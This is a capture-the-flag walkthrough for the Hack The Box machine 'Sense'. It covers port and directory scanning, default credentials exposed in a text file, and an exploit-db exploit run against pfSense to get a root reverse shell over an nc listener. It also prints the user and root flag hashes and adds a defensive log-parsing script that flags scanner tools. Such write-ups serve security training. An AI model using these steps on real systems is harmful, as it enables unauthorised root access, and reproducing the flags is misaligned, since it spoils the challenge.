[HTB] Sense

Today we are going to hack the HTB machine called Sense.

Enumeration


To start, we run an nmap scan to see which ports are open.

sml@Cassandra:~$ sudo nmap -sV -sS -p- 10.10.10.60
[sudo] password for sml: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 17:45 CEST
Nmap scan report for 10.10.10.60
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 267.68 seconds

We look for anything interesting on the web server...

sml@Cassandra:~$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/05/12 15:57:35 Starting gobuster
===============================================================
/themes (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/widgets (Status: 301)
/tree (Status: 301)
/shortcuts (Status: 301)
/installer (Status: 301)
/wizards (Status: 301)
/csrf (Status: 301)
/system-users.txt (Status: 200)

We visit https://10.10.10.60/system-users.txt and can see the credentials for logging in to pfSense... We check the version and look for an exploit we can use.
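
As an added example (not part of the original writeup), here is the defender's view of the enumeration above: a small Python script that runs over constructed lighttpd access-log lines in combined format and flags source IPs whose request pattern looks like a directory brute force (several 404s or a scanner User-Agent such as gobuster's), plus any successful response for a credential-looking text file like system-users.txt. The sample lines, the regular expressions and the thresholds are my own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of lighttpd access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.10.14.3 - - [12/May/2020:15:57:35 +0000] "GET /themes HTTP/1.1" 301 0 "-" "gobuster/3.0.1"
10.10.14.3 - - [12/May/2020:15:57:35 +0000] "GET /admin.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
10.10.14.3 - - [12/May/2020:15:57:36 +0000] "GET /backup.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
10.10.14.3 - - [12/May/2020:15:57:36 +0000] "GET /changelog.txt HTTP/1.1" 200 271 "-" "gobuster/3.0.1"
10.10.14.3 - - [12/May/2020:15:57:37 +0000] "GET /system-users.txt HTTP/1.1" 200 106 "-" "gobuster/3.0.1"
10.10.14.3 - - [12/May/2020:15:57:37 +0000] "GET /secret.txt HTTP/1.1" 404 345 "-" "gobuster/3.0.1"
192.168.1.20 - - [12/May/2020:16:02:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.20 - - [12/May/2020:16:02:11 +0000] "GET /css/pfSense.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumed indicators: common brute-force tool UAs and credential-looking file names.
SCANNER_UA = re.compile(r"gobuster|dirb|dirbuster|nikto|wfuzz", re.I)
SENSITIVE_PATH = re.compile(r"/(system-users|users|passwords?|creds?|backup)[^/]*\.txt$", re.I)

def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(log_text, min_404=3):
    """Flag brute-forcing sources and successful hits on sensitive-looking files."""
    per_ip = defaultdict(lambda: {"404": 0, "paths": set(), "scanner_ua": False})
    exposed = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue  # skip malformed lines rather than crash on them
        st = per_ip[rec["ip"]]
        st["paths"].add(rec["path"])
        if rec["status"] == "404":
            st["404"] += 1
        if SCANNER_UA.search(rec["ua"]):
            st["scanner_ua"] = True
        if rec["status"] == "200" and SENSITIVE_PATH.search(rec["path"]):
            exposed.append((rec["ip"], rec["path"]))  # a file that should not be served
    suspects = sorted(ip for ip, s in per_ip.items() if s["404"] >= min_404 or s["scanner_ua"])
    return {"suspects": suspects, "exposed": exposed}
```

A hit in "exposed" is the actionable finding: the file itself should be removed from the web root, independently of whether the scanning IP is blocked.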

sml@Cassandra:~$ searchsploit pfsense
----------------------------------- ----------------------------------------
 Exploit Title                     |  Path
                                   | (/usr/share/exploitdb/)
----------------------------------- ----------------------------------------
pfSense - 'interfaces.php?if' Cros | exploits/hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site | exploits/hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross- | exploits/hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cr | exploits/hardware/remote/35070.txt
pfSense - (Authenticated) Group Me | exploits/unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Mul | exploits/php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripti | exploits/php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 -  | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabili | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversa | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Executio | exploits/php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripti | exploits/php/webapps/41501.txt
pfSense 2.4.1 - Cross-Site Request | exploits/php/remote/43341.rb
pfSense 2.4.4-P3 - 'User Manager'  | exploits/freebsd/webapps/48300.txt
pfSense 2.4.4-p1 (HAProxy Package  | exploits/php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scri | exploits/multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.5 | exploits/php/webapps/46936.txt
pfSense < 2.1.4 - 'status_rrd_grap | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 -  | exploits/php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config Fi | exploits/php/webapps/39306.html
pfSense Firewall 2.2.6 - Services  | exploits/php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross | exploits/freebsd/webapps/24439.txt
----------------------------------- ----------------------------------------
Shellcodes: No Result

Exploitation


We pick pfSense < 2.1.4 - 'status_rrd_grap (exploits/php/webapps/43560.py). We start a nc listener...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...

And we launch the exploit.

sml@Cassandra:~$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 5555 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

We get a root shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 55495
sh: can't access tty; job control turned off
#

user.txt



# cd /home
# ls
.snap
rohit
# cd rohit
# ls
.tcshrc
user.txt
# cat user.txt
8721327cc232073b40d27d9c17e7348b
#

root.txt



# cd /root
# ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
# cat root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86
#

End


And with that we have both the "user" flag and the "root" flag.